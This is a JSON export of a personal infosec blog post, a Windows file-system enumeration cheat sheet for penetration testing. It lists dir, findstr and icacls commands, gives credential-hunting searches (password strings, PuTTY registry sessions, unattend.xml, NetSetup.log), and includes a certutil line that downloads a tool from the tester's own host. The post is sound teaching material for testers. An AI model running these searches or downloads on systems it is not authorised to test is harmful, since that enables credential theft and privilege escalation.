{"id":2189,"date":"2021-01-09T17:01:39","date_gmt":"2021-01-09T16:01:39","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=2189"},"modified":"2024-09-01T12:27:16","modified_gmt":"2024-09-01T10:27:16","slug":"windows-file-system-enumeration","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=2189","title":{"rendered":"Windows file system enumeration"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">dir<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Gen\u00ader\u00adal:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>For all com\u00admands: <strong>Use \/p<\/strong> to get a pause for large out\u00adputs to scroll over!<\/li>\n\n\n\n<li>Use \/a! Every\u00adtime! Use \/a! Every\u00adtime! Use \/a! Every\u00adtime! Use \/a! Every\u00adtime! Use \/a! Every\u00adtime! Use \/a! Every\u00adtime! Use \/a! Every\u00adtime! Use \/a! Every\u00adtime! Use \/a!<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Usu\u00adal commands:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Search recur\u00adsive:<br><code>dir \/s \/a *.txt<\/code><\/li>\n\n\n\n<li>Show hid\u00adden files:<br><code>dir \/ah<\/code><\/li>\n\n\n\n<li>Show sys\u00adtem files:<br><code>dir \/as<\/code><\/li>\n\n\n\n<li>Show file own\u00ader\u00adship infor\u00adma\u00adtion<br><code>dir \/q<\/code><\/li>\n\n\n\n<li>Show \u2026 more?!<br><code>dir -force<\/code><\/li>\n\n\n\n<li>Show also <a href=\"https:\/\/blog.malwarebytes.com\/101\/2015\/07\/introduction-to-alternate-data-streams\/\">alter\u00adnate data streams<\/a>:<br><code>dir \/R<\/code>\n<ul class=\"wp-block-list\">\n<li>Read alter\u00adna\u00adtive data streams: If a file is list\u00aded like <code>root.txt:root.txt:$DATA<\/code>, then you can read the file with more (yes, on Win\u00addows):<br><code>more &lt; root.txt:root.txt:$DATA<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>There\u00adfore<\/strong>: Remem\u00adber to use <code>dir \/R \/as \/ah -force<\/code>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">tree<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Start with cre\u00adat\u00ading a list of all direc\u00adto\u00adries and files. Down\u00adload it. It\u2019s way eas\u00adi\u00ader to look in a local edi\u00adtor and it\u2019s stored for the future as&nbsp;well.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>tree c:\\ &gt; C:\\Windows\\Temp\\dsys\\dirs.txt<br>dir \/s \/R \/as \/ah c:\\ &gt; C:\\Windows\\Temp\\dsys\\files.txt<br>(Download the files)<\/code><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">find (=grep)<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Search for a string in an out\u00adput, e.g. in a direc\u00adto\u00adry listing:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">dir | find \"eyfile\"<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Search <em>one<\/em> string in a sin\u00adgle&nbsp;files:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">find \"assword\" $file<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Search a string <em>out of a set of strings<\/em> in a sin\u00adgle file (Note: find\u00adstr sup\u00adports regexp):<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">findstr \"assword eyfile\" $file<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Grab line 101 from a large text file: Use find\u00adstr \/n to out\u00adput the textfile with line num\u00adbers, then fil\u00adter for your number.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">findstr \/n $searchstring $file |find \"101\"<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Find a string in a large file \/ out\u00adput and get the lines around it:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">type d.txt | findstr \/n ^^ | findstr \"Igor\" \/\/ Search for a string to determine the line number.\ntype d.txt | findstr \/n ^^ | findstr \"^323\" \/\/ Here, the string appears at line 32318. 323 shows 100 lines around.<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">wc (word&nbsp;cound)<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">There is no wc com\u00admand for Win\u00addows, but with the fol\u00adlow\u00ading, a line count can be displayed:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">type $largefile | find \/c \/v \"\"<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">File system permissions<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Check per\u00admis\u00adsions with icacls:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">icacls file.exe<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Manual directory inspection<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Now, check the fol\u00adlow\u00ading directories:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>C:\\Users<\/li>\n\n\n\n<li>C:\\Program Files [(x86)]\n<ul class=\"wp-block-list\">\n<li>Cre\u00adate a list with each non-stan\u00addard program.<\/li>\n\n\n\n<li>Search for exploits.<\/li>\n\n\n\n<li>Search for sen\u00adsi\u00adtive infor\u00adma\u00adtions&nbsp;in&nbsp;<ul class=\"wp-block-list\">\n<li>the files with\u00adin the pro\u00adgram direc\u00adto\u00adry<br><code>findstr \/spin \"assword\" <em>.<\/em><\/code><\/li>\n\n\n\n<li>the reg\u00adistry (try to find the path(s) in the net)<br><code>reg query \"HKCU\\Software\\SimonTatham\\PuTTY\\Sessions\"<\/code><\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Check if pro\u00adgram files are write\u00adable:<br><code>certutil.exe -urlcache -split -f \"http:\/\/$ownIP\/accesschk.exe\" accesschk.exe<br>accesschk.exe \/accepteula -uws \"Everyone\" \"C:\\Program Files\"<\/code><\/li>\n\n\n\n<li>Check for unquot\u00aded ser\u00advice path. E.g. for <em>C:\\Program Files\\app 2\\app.exe<\/em>:\n<ul class=\"wp-block-list\">\n<li><em>C:\\Program.exe<\/em><\/li>\n\n\n\n<li><em>C:\\Program Files\\app.exe<\/em><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>C:\\Inetpub (or anoth\u00ader serv\u00ader directory)<\/li>\n\n\n\n<li>Pos\u00adsi\u00adble inter\u00adest\u00ading files:<br><code>%windir%\\debug\\NetSetup.log #AD domain name, DC name, internal IP, DA account<\/code><\/li>\n\n\n\n<li>Check dri\u00adves with <code>wmic logicaldisk get caption || fsutil fsinfo drives<\/code> and then D:\\&nbsp;E:\\&nbsp;.\u2026<\/li>\n\n\n\n<li>Look into the trash:<br><code>dir C:\\$Recycle.Bin \/s \/b \/R<\/code><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Advanced<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Search for files with\u00adin an inter\u00adest\u00ading time win\u00addow:<br><code>powershell.exe -ExecutionPolicy ByPass -command \"&amp; { Get-ChildItem -ErrorAction SilentlyContinue -Path c:\\ -Recurse | Where-Object -FilterScript { $_.LastWriteTime -ge (Get-Date '16 Mar 2017 00:00') } | Where-Object -FilterScript { $_.LastWriteTime -lt (Get-Date '18 Mar 2017 00:00') } }\"<\/code><\/li>\n\n\n\n<li>Find pass\u00adword strings:<br><code>findstr \/si password *.*<\/code><\/li>\n\n\n\n<li>Find recent\u00adly changed files:<br><code>Get-ChildItem -Path c:\\ -Recurse | Where-Object -FilterScript { $_.LastWriteTime -ge (Get-Date).AddHours(-24) }<\/code><\/li>\n\n\n\n<li>Search for unattend.xml files \/ pro\u00advi\u00adsion\u00adal files. These files are often cre\u00adat\u00aded by Win\u00addows for back\u00adground jobs and could con\u00adtain cre\u00adden\u00adtials.<br><code>dir -force \/as \/s *nattend.xml<\/code><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>dir Gen\u00ader\u00adal: Usu\u00adal com\u00admands: There\u00adfore: Remem\u00adber to use dir \/R \/as \/ah \u2011force. tree Start with cre\u00adat\u00ading a list of all direc\u00adto\u00adries and files. Down\u00adload it. It\u2019s way eas\u00adi\u00ader to look in a local edi\u00adtor and it\u2019s stored for the future as&nbsp;well. tree c:\\ &gt; C:\\Windows\\Temp\\dsys\\dirs.txtdir \/s \/R \/as \/ah c:\\ &gt; C:\\Windows\\Temp\\dsys\\files.txt(Download the&nbsp;files)&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[483],"tags":[50,107,24],"class_list":["post-2189","post","type-post","status-publish","format-standard","hentry","category-howtos","tag-enumeration","tag-file-system","tag-windows"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2189","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2189"}],"version-history":[{"count":27,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2189\/revisions"}],"predecessor-version":[{"id":4171,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2189\/revisions\/4171"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2189"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2189"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2189"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}